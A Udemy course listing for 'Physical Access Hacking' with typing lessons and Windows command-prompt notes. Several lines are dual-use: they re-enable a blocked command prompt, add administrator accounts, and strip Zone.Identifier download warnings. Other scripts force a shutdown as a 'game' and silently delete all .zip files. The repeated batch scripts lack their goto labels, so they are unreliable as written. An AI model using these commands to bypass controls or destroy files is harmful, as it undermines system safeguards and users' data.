Physical Access Hacking Windows Xp, 7, 8, 10, Linux & Typing
2.9 (73 ratings)
Course Ratings are calculated from individual students’ ratings and a variety of other signals, like age of rating and reliability, to ensure that they reflect course quality fairly and accurately.
14,096 students enrolled

Physical Access Hacking Windows Xp, 7, 8, 10, Linux & Typing

Learn hacking, and how to type from someone who has reached 120 W.P.M. This Speed is within the top 1% of typists.
2.9 (73 ratings)
Course Ratings are calculated from individual students’ ratings and a variety of other signals, like age of rating and reliability, to ensure that they reflect course quality fairly and accurately.
14,096 students enrolled
Created by Joseph Moon
Last updated 3/2020
Current price: $135.99 Original price: $194.99 Discount: 30% off
5 hours left at this price!
30-Day Money-Back Guarantee
This course includes
  • 8 hours on-demand video
  • 2 downloadable resources
  • Full lifetime access
  • Access on mobile and TV
  • Certificate of Completion
Training 5 or more people?

Get your team access to 4,000+ top Udemy courses anytime, anywhere.

Try Udemy for Business
What you'll learn
  • How to Physical Access Hack Computers that are infront of them, while having Physical Access to it.
  • Learn how to type 93+ Words Per Minute, Be within the Top 5% of Touch Typists in the World.
  • Learn General and Advanced Command Prompt Knowledge.
  • Learn General and Advanced Linux Terminal Knowledge.
  • Learn how to hack Windows 10, Windows 8, Windows Vista, Windows 7, Windows Xp, and Raw Hard Drives, as well as Wpa Wifi Routers.
  • Must know English, and how to read fluidly, Knowing how to type smoothly is not necessary, I will have typing instructions in this lesson package as well which will help you to reach speeds of 93+ W.p.M. if you dedicate yourself to my training routine. I type fast, I do tutorials some-what fast, so I won't waste your time, I'll just get the lessons you need to know out to you. You'll first learn a fair amount about Windows In General before proceeding to learning about Hacking.

How to hack, how to touch type, using a faster method called, "Key Rollovers" instead of the standard method typically taught in schools. Everything is laid out very carefully to ensure that it's easy to learn from. I have been using computers since I was 13 years old, now I am 29 years old. I have learned my way around the Windows Command Prompt, and Linux Terminal and I also have experience in Data-Recovery which I plan to pass onto you during the Course.

Who this course is for:
  • People interested in Computers, People who want to learn Basic and Advance things about Command Prompt, .BAT files, and Linux Terminal. Mainly people who are very curious about Tech in General, Determined individuals, People who want to increase their Typing Speed. You must be very determined to learn, I cannot show you everything about your computer, router, but I can show you what I do with mine, so it may vary slightly. It takes a lot of Determination in order to learn what you need to in order to work on computers. This Tutorial is for Future White Hat Hackers only, I don't approve of Black Hat Hacking.
  • People with interest in Cmd, Windows, and Linux.
  • Anyone with interest in recovering data that has been recently deleted, or recovering files from a Formatted Drive.
Course content
Expand all 68 lectures 08:06:03
+ Introduction: Physical Access Hacking, Windows Xp, 7, Vista, 8, 10, Linux, Drive
10 lectures 01:38:55

A quick intro for using this course on the Udemy Platofrm.

Preview 02:28

Physical Hacking Demo: Pentesting Windows Xp, Vista, 7, 8, 10, Linux Os, and Raw Hard Drives


     I do not condone hacking into other People's Computers. This is just a Demonstration of how a hacker could perform the hacks on each Operation System, It is better to know what is possible rather than believing that your files are safe if you leave them alone with a potential hacker.

Preview 20:51

Introduciton: What my Lessons have to offer you.


     This is the introductory video, all text needed is already within the video. There is nothing being taught here, just an introduction on what will be taught in the near future.

Introduction: What My Lessons have to offer you.

121 Words Per Minute, This is a video showing how fast I can Type. I will be teaching you how to touch type as well.

Preview 01:46

     Words Per Minute Facts based off of 10fastfingers and typeracer statistics:

Did you know that if you can reach the following speeds, you are in the top percentages of Typists?

80 W.P.M. You're in the Top 10% fastest in the world? Only 9 out of every 100 Typists can defeat you.

93 W.P.M. You're in the Top 5% fastest in the world? Only 4 out of every 100 Typists can defeat you.

103 W.P.M. You're in the Top 2% fastest in the world? Only 1 out of every hundred can defeat you.

120 W.P.M. You're in the Top 1% fastest in the world? Less than 1 out of every hundred can defeat you.

     I believe I can get anyone typing to 93+ W.P.M. if they follow the lesson plan that I've laid out for them in this video, and just train it regularly. You will notice that your speed will eventually start to increase through the use of "Key Rollovers" Pressing multiple keys down at one time instead of rapidly pressing one key after another. In the long term, this will also improve your accuracy because you will be making less motions to get your word spelt, a word like land would take 4 movements in order to type using the Standard Touch Typing Method. Using the Standard Touch Typing Method Combined with Key Rollovers it will only take one motion. This saves 3 additional motions and prevents the chances that you'd make a mistake while improving your speed.

     I have designed my own Onscreen Keyboard which you can use to take the lessons that I took within this video, you can download it and begin immediately. Note: You may need to allow the keyboard to run through your anti-virus program, because it monitors keystrokes, to keep stats on your Key Rollovers, Keystrokes during the last 5 seconds, and Raw W.P.M. Speed during the last 5 seconds. Most anti-virus programs do not like programs that monitor keystrokes. If you have a problem with disabling your anti-virus program, you can just watch from the video, pause, rewind and learn from it instead by opening your note-pad and typing the same words that I do. But if you do download the onscreen keyboard, you can practice at your own pace without having to pause the video for this Typing Lesson.


The "land" is a 1 motion word all keystrokes can be typed at once using different fingers.

L Right Ring Finger.

A Left Pinky Finger.

N Right Pointer Finger.

D Left Middle Finger.

To check if you're typing it using key rollovers, press and hold down all of the keys.


It should repeat the last keystroke that was pressed and held.

"fl-ower" is a 2 motion word, "fl" can be pressed together, then the user must release their fingers from their keyboard and press "ower" together.



My Theory on increasing Typing Speed.

Basic Explanation: Standard Touch Typing has helped us a lot right? However, every lesson I've taken has always taught us to press a key down, then release it, then strike the next keystroke until we get our words spelled.

What we need to change: We press keystrokes in bunches vs. individual keystrokes when it's possible using the standard touch typing finger placement.

1st Note: We must know the standard way of touch typing, using 9 fingers, excluding 1 thumb.

2nd Note: We must remember to press the available key combinations down within milliseconds of each other, holding them the same time, to complete the words in the least possible amount of motions.

3rd Note: Some key combinations in a single motion will not be possible to press at the same time due to lack of finger flexibility, for these, we will press them rapidly one after another as we were originally taught, grouping together what keys we can, whenever our finger flexible allows it.

Increase your typing speed using Key Rollovers: Become more efficient at typing!

This video shows a demonstration of what Hacking Windows 10 Looks like, It doesn't teach it, but rather shows what will be taught in the near future.

Demonstration Lan, Wlan Hacking: Windows 10 Pc.

This Video is a Demonstration of me Hacking into my Windows 7 Computer, It's not a tutorial, but rather shows what will be taught in the near future.

Demonstration Lan, Wlan Hacking: Windows 7 Pc.

     First of all, you can download isos of several verisons of windows from here.

     Go to the Virtualbox site, download and install their program for windows hosts if you're using windows.

1. click new, fill in name, type of windows and the version of windows that you plan to install.

2. slide the ram to not the end of the green but almost, according to your system's ram. I recommend a computer with atleast 4 gb of ram in order to run a virtualbox.

3. create hard disk now, choose VDI, choose dynamically allocated space. This means it will only use memory as it needs out of the 12 GB that we set for our virtual hard drive space.

4. Choose 12.0 GB of space if you plan to install windows 7 (make sure you have the available space on your pc. (you always want to keep 50% of your hard drive freed up so that your version of windows doesn't crash, so you may want to go through your system and delete some space that you have taken up on your pc before doing this step. (Hint on what to delete, Video Files usually take up the most space on people's computers.)

5. Click Create, right click w7 Virtualbox, go to settings go to storage, you can see w7.vdk that's our virtual hard drive, now we are clicking the +disk icon to add a virtual disk into the virtual disk drive, then we remove the virtual disk drive that is empty.

6. Press Okay.

7. click start after highlighting w7 virtual box.

8. hold the right ctrl tap the "c" key so that you can resize virtualbox to a smaller size so that it won't be scaling with the Virtualbox resolutions.

9. exit, power down the machine.

10. start it again, select "F12" as the onscreen instructions say, to go to the virtualbox boot menu (this is just like selecting a boot device in windows.

11. select "c" to enter the cd rom as the on-screen instrucitons say.

12. It will boot from the iso file as if you are booting from a bootable disk.

13. Wait for setup to start, accept the license agreement, select next.

14. select custom/advanced, choose the virtualhard drive, it should be "unallocated space" because it's empty when you first create your virtualbox, you can install windows on the 12.0 GB of space that we set for our virtualbox.

15. wait for windows to install, then you have a virtual windows running within your windows, you can then boot from kali iso file as a disk drive, or from windows 7 iso file as a disk drive and practice hacking into your own virtualbox if you do not have several different kinds of Actual Computers to practice with.

     Note: A quick google search can reveal how much ram and hard drive are required for each operating system that you plan to install.

Just go to and type the following,
Search 1: "ram required windows 7"

Search 2: "hard drive space required windows 7"

just read the the results that come up and you should be able to figure it out.

Basic Setup on how to use Virtual Box if you do not have more than one computer.

200+ on a short quote caught on video and 140+ wpm held for 1 minute.

Preview 01:35
+ Windows Command Prompt Lessons.
24 lectures 02:15:10

1. Access the command prompt if it's blocked


enable command prompt

A quick way to access the command prompt is to hold in the windows key, and tap the "R" key,

then type "cmd" and press Enter.

1. hold Windows key, tap "R".

2. type "gpedit.msc" press Enter.

3. Under user configuration, double click "Administrative Templates"

4. It may be here, or you may need to click "All Settings", depending upon what version of windows you have. It is in Alphabetical order. Look for "Prevent Access to Command Prompt" Double click it.

5. If it's enabled, left click, "Not Configured", and press ok.

6. Now try to access the command prompt again.

1. Access Command Prompt

2. Opening the Command Prompt


1. left click search the web and windows, type cmd, left click command prompt.

2. left click search the web and windows, type cmd, right click command prompt left click open file location.

     This opens the location to the short-cut, now right click it and left click open file location again, it opens the true path of the command prompt, it is in the c:\windows\system32 folder. You can right click on the command prompt and open it regular, or as an administrator, or just doubleclick it to open.

3. hold your windows key down on keyboard, and type the "r" key, type "cmd" and press enter.

4. You can start the command prompt from within the command prompt by typing the variable, "start %comspec%" into a Command Prompt.

5. "Shutdown /L" logs off the user of the computer.

6. Hold down your right shift key, while restarting your computer, Left Click troubleshoot, advanced options, command prompt. (Your computer could be slightly different, but look for it.) Left click on your username, enter your password, and it boots window up in command prompt only mode. Once I am logged into the cmd only mode, I can type,

"wmic logicaldisk get caption, description, filesystem"

Type D: to switch to the D drive, you may have to try a few different drives before landing in the Windows 10 User's hard drive. When you wish to shutdown the system navigate to the

user's drive Letter\windows\system32 folder then type, "shutdown.exe /s /t 02" to shut the system down in 2 seconds.

2. Opening Command Prompt

3. Change the Appearance of the Command Prompt


1. type "color /?" then change the colors by typing in a code.

2. "color 0c" makes my command prompt black background and red text.

3. You can also press alt+space and left click properties for the Gui (Graphical User Interface)

options to change things such as opacity and more.

3. Change the Appearance of the Command Prompt

4. Navigating in the Command Prompt


1. dir = views directories (folders), from within the command prompt.

2. cd "folder name" = to navigate forward through a directory whether it has spaces in the name or not.

3. cd .. = to navigate back a directory.

4. cd "c:\users\user1\desktop\folder 2" & dir = would navigate to a folder called, folder 2. You must wrap quotes around the path if the path contains spaces, then it would list the directories within that directory.

5. In your current working directory if you type part of the name and press the tab key, it should auto-fill out the rest of the name or the closest it can find in alphabetical order for you. If you keep pressing tab and have multiple file possibilities with that name it will switch between them.

6. dir /? = view switches, and read about them.

7. dir /od = lists everything by date.

8. dir /a /od = lists everything by date and all hidden files by date also.

4. Navigating in the Command Prompt

5. Create Folders, Rename, Delete, Move, Files


1. rename 1.txt "The First One.txt" & dir = renames 1.txt to The First One.txt then lists the directories.

2. del "Windows 10 Update Assistant.lnk" & dir = deletes the short-cut to Windows 10 Update Assistant.lnk

3. mkdir "folder1" = creates a new folder names folder1.

4. rd "folder1" /s & dir = removes folder1 from current directory and lists the files in your current directory. You may need to type, "y" to confirm that you are removing the directory.

5. if you are currently at a folder in the desktop called folder2 and have a folder within it called folder1

move "folder1" "c:\users\user1\desktop\The New Folder1" = To move a file from the current directory to the username user1's Desktop and rename it.

move "folder1" .. = to move folder1 back 1 directory.

5. Create Folders, Rename, Delete, Move, Files

6. Copy Files & Folders from Pc to Usb


1. Hold "Windows Key", tap "R", type, "cmd" press Enter.

2. wmic logicaldisk get caption,description,filesystem = shows the drives connected to the Windows Pc.

3. e: = navigates to the E: Drive.

4. mkdir "W10 Folder1" & dir = Makes a Folder on the E Drive, then lists the directories on the E Drive.

5. c: & dir = Navigates to the C: Drive, and lists the Dictories.

6. cd Desktop & dir = Navigates to the Desktop & Lists the Directories.

7. cd Folder1 = Navigates to Folder1 which has a file in it that I wish to copy.

8. copy 1.txt e:\"W10 Folder1" = copies 1.txt to "E:\W10 Folder1"

9. e: & dir = switches to the E: drive, and lists the directories.

10. cd "W10 Folder1" = Navigates to W10 Folder1 directory.

11. dir = Lists the directories, I see the file that I copied.

12. cd .. = Navigates back a Directory.

13. c: & dir = Navigates to the C: Drive, and lists the directories.

14. cd .. = goes back a directory.

15. cd "Folder the 2nd one" & dir = goes to a directory called, "Folder the 2nd one" and lists the directories within it.

16. xcopy *.* e:\"W10 Folder2" /e /i = copies all files and subfolder files from within the current folder.

"/e" copies the directories and subdirectories, including the empty ones.

"/i" if the destination does not exist, and you're copying more than one file it will create the path we list in the Destination portion of the Command.

17. e: & dir = Navigates to the E: drive and lists the Directories.

18. cd "W10 Folder2" & dir = Navigates to Folder 2 on the E: drive, and lists the files.

19. "Alt+tab" switches to Windows File Explorer, sometimes you have to right click in an open area and refresh the explorer before a newly added file will show up.

6. Copy Files, Folders from Pc to Usb

7. Using Xp to Navigate, Copy, Remove Directories, and Files


1. cd .. = goes backa directory.

2. alt+space+e+enter = puts command prompt in copy mode.

3. xcopy "c:\documents and settings\username\desktop\share\*.*" "c:\documents and settings\username\desktop\sharedcopy" = copies files from share folder, to a new folder called sharedcopy in windows xp.

4. copy "file1.txt" "c:\documents and settings\username\file1.txt" = copies a single file from desktop to the user's folder.

5. rmdir "share" /s = removes the share folder from the current working directory if there is any.

7. Using Xp to copy files and folders, and removing directories

8. Router Access p1 Changing Ip Address


1. ipconfig = When entered in the Command Prompt, it checks router's default gateway ip address, Enter it in your browser.

2. ipconfig /release = releases the ip address from the current device that you're using in windows.

3. ipconfig /renew = gets an address assigned to the current device that you're using from Windows.

4. You can change dhcp settings of your router, to get a new local ip.

5. You can also restart your main router, in most cases this would assign a different public ip address.

6. If you have 2 Routers. You can find Ip address of first router, through the Status Page of 2nd router.

7. Also used Simple Port tester to check for open ports.

8. If something were to happen and your Router Malfunctions and won't let you get back on the Internet, you can hold the little reset button on the back of your router for around 42 seconds, then wait for about 5 minutes and connect to it, it should work again in most cases.

8. Router Access p1 Changing Ip Address

9. Router Access, Changing Mac Address


1. ipconfig /all = Checks the Mac Address of a Windows Pc.

2. (Alt+Space)+E+Enter = Goes into Copy Mode from the Command Prompt press Enter after left clicking and dragging across the text or numbers that you'd like to copy.

(This is not necessary in Windows 10, but is in other versions of Windows so it's a good

idea to stay in practice.)

3. notepad.exe = opens notepad from command prompt.

4. Ctrl+v = pastes the mac address into my notepad.

5. go to

6. Type in a namebrand of computer you would like to spoof your mac address as.

7. I copy and paste the first 6 digits of the mac from the site into the notepad.

8. (Alt+Space)+e+Enter = I go back to the command prompt and make a copy of the last 6 characters of the old mac address.

9. Change the mac address slightly and put them together.

10. Search the web and windows, "Device Manager"

11. Left click Network adapters, right click my network adapter, left click properties.

12. Left click Advanced

13. look for locally administered address.

14. Checkmark the box that says Value.

15. Copy the new Mac Address you would like to spoof in it.

16. Press ok.


1. For Windows 7, Open the Device Manager,

2. Right click on your network adapter, left click properties,

3. left click advanced,

4. left click network address,

5. checkbox the Value box.

6. Change the value, checkmark the value box and press ok.


Back to our Windows 10 Pc.

17. We are connected to the Internet again, so let's check out our New Mac Address.

18. First, I make a copy of my old physical address, and paste it in the open notepad.exe

19. ipconfig /all = refreshes your physical address

20. going back to

21. performing a search for the first 6 digits we spoofed our mac address as.

22. It shows up as a Dell as we wanted it to.

9. Router Access p2, Changing Mac Address

10. Accessing your Router, Who's on my Wifi?


In this example, I have a total of 2 Routers, my Router I got from my Internet Provider Windstream, and a 2ndary router connected to it, then I have my Pc connected to the 2ndary router, I will be port forwarding through both routers so that My Pc will have the port open. (Note: This is required for some video games, your router pages may look different than mine.)


This is something that you need to watch the video to find out, as there are

many things to show you

that would be a bit tough to explain in text.

1. ipconfig = displays default Gateway of Router.

2. (Alt+Space)+e+enter = left click, hold and highlight default gateway's ip.

(this is the router that's connected to your pc directly)

3. press enter after highlighting the default gateway ip to copy it.

4. Ctrl+V = to paste the default gateway ip after left clicking the address

bar of your browser.

5. enter "admin" for username and "admin" for password, most are set to that by default, if it's not that look on your router for username & password.

6. Check out "status" or "dchp" it could be different things, so just have a look around for the connected devices to your router.

7. It will show everyone who's using the router currently.

8. I can find the mac address on a dd-wrt configured router by left clicking status, and Lan.

9. We can do a basic port forward through the NAT function.

10. = go here to find guides for your specifc router.

11.  = If you can't login to your router, you can check out this site, they store a lot of the default Router passwords

for Most Routers.

12. If I go to "Status" and "Wan" on my ddrwt router, I will get to see my other router that's connected to it,

13. The Ddrwt router in this video is connected as a 2ndary router, the

first router was the Windstream router.

14. For my router I am using in the video, I click the wireless tab, and mac

filter tab within it.

15. then select enable and edit mac filter list.

16. I could block a computer from accessing the wifi from the router, and getting on my wifi if they did not know how to spoof their Mac Address.

17. cls = clears screen of the Command Prompt.

18. ipconfig /release = disconnects me from the Internet.

19. ping = if you receive bytes of data back you are online, if

not you are offline.

20. ipconfig /renew = reconnects to the internet


To Port forward through both routers,

1. visit 2ndary router page.

2. I go to status, system info, by the way the wan mac is the mac address of my 2ndary router.

3. left clicked on wan to find the default gateway ip.

4. I enter it in a new tab, enter name and pass if necessary

5. I go to device info & dhcp My 2nd router's mac address shows up as a connected client, I copy the ip address associated to the 2nd router

that's connected to my first router.

6. I left click advanced setup, NAT, Virtual Servers,

7. I named it port (you can name it after anything) and port forwarded through my 2ndary router's ip.

8. I make 2 entries, tcp and udp to show both examples.

9. Next, I go to my 2nd router's page, left click status and Lan.

10. here we see my active client, which is the pc that I am using, I copy the ip address.

11. I go to nat and I name this one port1 just to make sure there are no interference with the 1st router page.

12. I port forward 1620 through tcp and udp

13. = Next,

I downloaded Simple Port Tester to check the forwarded ports, it was a success,

you can download it to from Major Geeks.

I also added a port that I've never forwarded, to show you how it looks when it failed.

10. Router Access p3 Who's on my Wifi?

11. Tasklist & Find and Kill Processes


1. tasklist = shows running processes.

2. (Alt+Space)+e+f = opens the find window, you can search for a process.

3. taskkill /im IMAGENAME.EXE /f = kills process by name.

4. taskkill /pid 1774 /f = kills process by PID, but must kill all of the pids associated with that process.

5. wmic process get ProcessID, Executablepath = Brings back the process name, and a path to the executable file used to open the Process.

6. (Alt+Space)+e+f = search for running process.

7. (Alt+Space)+e+enter = to be able to highlight an area to copy with the mouse, after highlighting an area, press enter again to copy.

8. (Alt+Space)+e+p = to paste text into the Command Prompt.

11. Tasklist & Kill Processes - Task Manager in Command Prompt

12. Directory/Folder Tree


1. Tree /a = Views all folders on Desktop.

2. Tree /f = Views all files & directories on desktop.

3. Tree /f > "c:\users\username\desktop\dirtree.txt" = imports results into a text file called dirtree.txt on the Username user's desktop.

4. dirtree.txt = Type an actual filename or .lnk short-cut link to open it.

5. If you navigate to the start of your "c:" by typing "cd .." repeatedly until there are no more directories to go back to, it will take you to the "c:" drive and perform "tree /f" It will perform a directory tree of your entire windows system. This will take a while.

6. If you would like to cancel a command, and do something else

You may do so by pressing "ctrl+c" this will cancel any command

you have running except "Format" Commands, which we will learn more about later.

12. Directory/Folder Tree

13. Some System Maintenance Commands


Right Click your Start Menu Command Prompt, Run As Administrator for Windows 10, or Search for Cmd and right click it and Left Click Run As Administrator for Windows 7 at this point you should already be at this path, but if you are not, navigate to the "c:\windows\system32" directory as some of these commands require you to be there.

1. whoami = displays name of computer & username.

2. echo %userdomain% = displays name of computer.

3. echo %username% = displays the username of who's logged in.

4. systeminfo = displays operating system, name, version, virtual memory available which is ram.

5. chkdsk /f = checks the windows files and makes sure they aren't currupted, if they are, try to fix them.

6. defrag.exe /? = to see help list of defrag commands.

7. defrag.exe c:\ /u /v = starts to analyze and defrag the drive.

8. cleanmgr.exe = opens disk cleanup for a quick refrresh.

Warning, it could delete your system restore points, if you select all options.

9. SystemPropertiesProtection.exe = for setting up Restore Points on system for System Restore.

10. rstrui.exe = to restore your computer to an earlier date.

11. ping = see if you're online or not, if you receive replies, you are online.

12. ipconfig /release = shutdown your Internet's interface.

13. ipconfig /renew = bring up your Internet's interface and request an ip from router.

14. tasklist = view running processes.

15. taskkill /im IMAGENAME.EXE /f = kill process by image name.

16. taskkill /pid 1720 /f = kill process by pid number, be sure to get all of the pid numbers associated with a process, check again with tasklist after you're done.

17. msconfig = typed from command prompt, then go to the startup tab, open the task manage if you're in windows 10, you can view the startup programs that starts up with your pc, don't disable unless you know the program and want to, or else you could stop pc from booting up.

18. shutdown /s = shuts pc down in 60 seconds.

19. shutdown /a = cancels a shutdown if typed before the shutdown happens. if set with shutdown /s /t 60.

20. shutdown /s /t 02 = shuts the pc down in 2 seconds.

21. right click on start menu, left click "Command Prompt (Admin)"

Or, go to your c:\windows\system32 folder and right click command prompt and left click run as Administrator (for earlier versions of windows.

22. net user Administrator /active:yes = enables administrator account.

23. net user Administrator /active:no = disables administrator account.

24. You can navigate to control panel, user's account using your mouse, and change the other users passwords if you're the Administrator.

25. cd "c:\program files\windows defender" = navigates to windows defender folder.

26. MSASCui.exe = brings up windows defender virus scanner.

If you're a Windows 7 User, you'll need to navigate to,

" cd "%programfiles%\windows defender" "

Then type, "MpCmdRun.exe | more" then set options in a similar fashion.

"mpcmdrun.exe -Scan -Scantype 2"

If nothing happens, you can type, "msascui.exe" and make sure Windows Defender is on.

27. mpcmdrun.exe | more = hold in enter until you get get at the bottom of the help page.

28. mpcmdrun.exe -Scan -Scantype 2 = run a full scan from command prompt.

If you run from safe mode with command prompt only, it could find more stuff.

29. Ctrl+c = to cancel the scan once started if you change your mind.

13. Some System Maintenance Commands

14. Create, Delete Users, Give Administrative Rights


1. Run Command prompt as Administrator, right click start menu in windows 10

select Command Prompt (Admin)

Note: in Windows 7 navigate to "c:\windows\system32" folder and right click on

cmd.exe and left click run as Administrator.

2. net user = view active users on this pc.

3. net localgroup administrators = shows administrators of the computer.

4. net user /add user2 password1 = creates user2 and gives it a password of password1.

5. net localgroup administrators user2 /add = adds user2 to the Administrators group.

6. net user /add user3 = creates a user called user3.

7. net user = view all current users on pc again.

8. net localgroup administrators = views all of the administrators on this pc.

9. you can view graphical interface by right clicking start menu and left clicking control panel in windows 10 or just by left clicking start, control panel in windows 7.

10. net user administrator /active:yes = makes administrator active.

11. net user administrator /active:no = makes administrator inactive again.

12. net user user2 /delete = remove the user2 account.

13. net user user3 /delete = removes the user3 account.

14. Create, Delete Users, Give Administrator Rights

15. Unblock Windows 10 Files


Left click Format, make sure "Word Wrap" is unchecked.

1. Double click to open a File from a different Computer, a warning message will come up. Left Click "More Info", and then "Run Anyway".

2. Another method is right clicking the File, Left clicking Properties, then Left clicking Unblock checkbox, then left clicking Apply.

3. echo . >"c:\pathtofile.fileextension":Zone.Identifier = The Command when placed in a .bat file unblocks the file, and makes no error or warnings pop up while it runs. A .Bat file actually executes commands as if you are entering them, except it can be auto-mated to enter several commands without requiring any user's assistence aside from the initial opening of the .bat File. Unblockf.bat file contents

@Echo off = Turns echo off, so it doesn't display the user's path in the command prompt while running the .bat file.

set mydir=%~dp0 = sets the directory that it's ran from as mydir variable, so it will look for the files to unblock in the folder that it's placed.

echo . >"%mydir%\LITTLEGAME1.BAT":Zone.Identifier = Unblocks

a file called LITTLEGAME1.BAT in the Directory that this .bat file is ran from.

Unblockf.bat File to unblock a single named file within the folder that this .bat file is ran from.


Unblockf.bat File to unblock a single named file within the folder that this .bat file is ran from.

@echo off

set mydir=%~dp0

echo . >"%mydir%\LITTLEGAME1.BAT":Zone.Identifier


Unblockf.bat file to unblock multiple files at once within the folder that this .bat file is ran from.

@echo off

set mydir=%~dp0

echo . >"%mydir%\LITTLEGAME1.BAT":Zone.Identifier

echo . >"%mydir%\LITTLEGAME2.BAT":Zone.Identifier

echo . >"%mydir%\LITTLEGAME3.BAT":Zone.Identifier


15. Unblock Windows 10 Files

16. Formatting a Drive


1. Format e: = erases everything on the e drive.

Becareful not to format the drive which contains your operating system.

Once you start a format, it cannot be cancelled by pressing Ctrl+C.

Formatting will delete all contents from the drive. Becareful not to Format the drive that has your operating system on it, or it will make the Pc Unbootable.

16. Formatting a Drive

Select Format Tab in Notepad.exe, make sure word wrap is unchecked.



@echo off

title A Little Game

shutdown /s /t 1200 /c "Computer will shutdown in 20 minutes unless you answer the first question correctly."


echo Welcome %username%, please tell me the person who owns this computer favorite color?

set /p input=Please type the favorite color here:

if /i "%input%"=="green" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto GREEN

if /i "%input%"=="red" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto RED

if /i "%input%"=="yellow and white" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto YELLOW

if /i "%input%"=="black" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto BLACK

if /i not "%input%"=="black" goto NONE


echo You better go green, because you just lost access to this computer for this session.


goto BEGIN


echo Red is the color of blood, of violence, it is my favorite color You may stay..


shutdown /a 2> nul & goto QTWO


echo Nope, not Yellow, you are wrong.


goto BEGIN


echo Black is creepy, and it looks a little cool, but nope that is not my favorite color, Try again..


goto BEGIN


echo I didn't recognise that Color, maybe you should take another guess?


goto BEGIN


echo It seems that you have made it to Question 2, What do I like to eat?

set /p input= Please type the favorite food here:

if /i "%input%"=="pizza" echo "%input%" >> "c:\users\user1\desktop\Question2.txt" & goto PIZZA

if /i not "%input%"=="pizza" echo "%input%" > "c:\users\user1\desktop\Question2.txt" & goto END


echo Of course it's Pizza, what else would it be?


echo this game will be exiting itself in 30 seconds, starting a countdown

echo when it reaches 20 seconds.


@ping -n 10 -w 1000 > nul

timeout /t 20 /nobreak



"C:\Users\User1\Desktop\Folder the 2nd one\IMAGE01.JPG"





@echo off

if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit

timeout /t 12 > nul

taskkill /im Microsoft.Photos.exe /f

taskkill /im cmd.exe /f


17. Writing Bat Files Part 1/3

Select Format Tab in Notepad.exe, make sure word wrap is unchecked.



@echo off

title A Little Game

shutdown /s /t 1200 /c "Computer will shutdown in 20 minutes unless you answer the first question correctly."


echo Welcome %username%, please tell me the person who owns this computer favorite color?

set /p input=Please type the favorite color here:

if /i "%input%"=="green" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto GREEN

if /i "%input%"=="red" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto RED

if /i "%input%"=="yellow and white" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto YELLOW

if /i "%input%"=="black" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto BLACK

if /i not "%input%"=="black" goto NONE


echo You better go green, because you just lost access to this computer for this session.


goto BEGIN


echo Red is the color of blood, of violence, it is my favorite color You may stay..


shutdown /a 2> nul & goto QTWO


echo Nope, not Yellow, you are wrong.


goto BEGIN


echo Black is creepy, and it looks a little cool, but nope that is not my favorite color, Try again..


goto BEGIN


echo I didn't recognise that Color, maybe you should take another guess?


goto BEGIN


echo It seems that you have made it to Question 2, What do I like to eat?

set /p input= Please type the favorite food here:

if /i "%input%"=="pizza" echo "%input%" >> "c:\users\user1\desktop\Question2.txt" & goto PIZZA

if /i not "%input%"=="pizza" echo "%input%" > "c:\users\user1\desktop\Question2.txt" & goto END


echo Of course it's Pizza, what else would it be?


echo this game will be exiting itself in 30 seconds, starting a countdown

echo when it reaches 20 seconds.


@ping -n 10 -w 1000 > nul

timeout /t 20 /nobreak



"C:\Users\User1\Desktop\Folder the 2nd one\IMAGE01.JPG"





@echo off

if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit

timeout /t 12 > nul

taskkill /im Microsoft.Photos.exe /f

taskkill /im cmd.exe /f


18. Writing Bat Files Part 2/3

Select Format Tab in Notepad.exe, make sure word wrap is unchecked.



@echo off

title A Little Game

shutdown /s /t 1200 /c "Computer will shutdown in 20 minutes unless you answer the first question correctly."


echo Welcome %username%, please tell me the person who owns this computer favorite color?

set /p input=Please type the favorite color here:

if /i "%input%"=="green" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto GREEN

if /i "%input%"=="red" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto RED

if /i "%input%"=="yellow and white" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto YELLOW

if /i "%input%"=="black" echo "%input%" >> "c:\users\user1\desktop\Question1.txt" & goto BLACK

if /i not "%input%"=="black" goto NONE


echo You better go green, because you just lost access to this computer for this session.


goto BEGIN


echo Red is the color of blood, of violence, it is my favorite color You may stay..


shutdown /a 2> nul & goto QTWO


echo Nope, not Yellow, you are wrong.


goto BEGIN


echo Black is creepy, and it looks a little cool, but nope that is not my favorite color, Try again..


goto BEGIN


echo I didn't recognise that Color, maybe you should take another guess?


goto BEGIN


echo It seems that you have made it to Question 2, What do I like to eat?

set /p input= Please type the favorite food here:

if /i "%input%"=="pizza" echo "%input%" >> "c:\users\user1\desktop\Question2.txt" & goto PIZZA

if /i not "%input%"=="pizza" echo "%input%" > "c:\users\user1\desktop\Question2.txt" & goto END


echo Of course it's Pizza, what else would it be?


echo this game will be exiting itself in 30 seconds, starting a countdown

echo when it reaches 20 seconds.


@ping -n 10 -w 1000 > nul

timeout /t 20 /nobreak



"C:\Users\User1\Desktop\Folder the 2nd one\IMAGE01.JPG"





@echo off

if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit

timeout /t 12 > nul

taskkill /im Microsoft.Photos.exe /f

taskkill /im cmd.exe /f


19. Writing Bat Files Part 3/3

Uncheck WordWrap under the format tab of Notepad.exe

Contents of startupq.bat


@echo off

title Startup Question


shutdown /s /t 60 /c "System Shutdown in 60 Seconds"

echo System Shutdown in 60 seconds.

set /p input=What do you want to do?

if /i "%input%"=="web" goto WEB

if /i "%input%"=="web" goto NONE

if /i "%input%"=="n" goto EMPTY


shutdown /a

timeout /t 01

start "" "C:\Windows\System32\notepad.exe"

timeout /t 01

start "" "C:\Users\User1\Desktop\Folder the 2nd one\IMAGE01.JPG"

timeout /t 01

start "" ""

timeout /t 02



shutdown /a

echo You have selected None.

timeout /t 05 > nul




Also I explain a short-cut is just a link to the file itself, rather than the actual executable file.

20. Writing Bat Files Part 4

delallzips.bat Deletes all .zips Files Contents.


@echo off

del .\*.zip /s /q


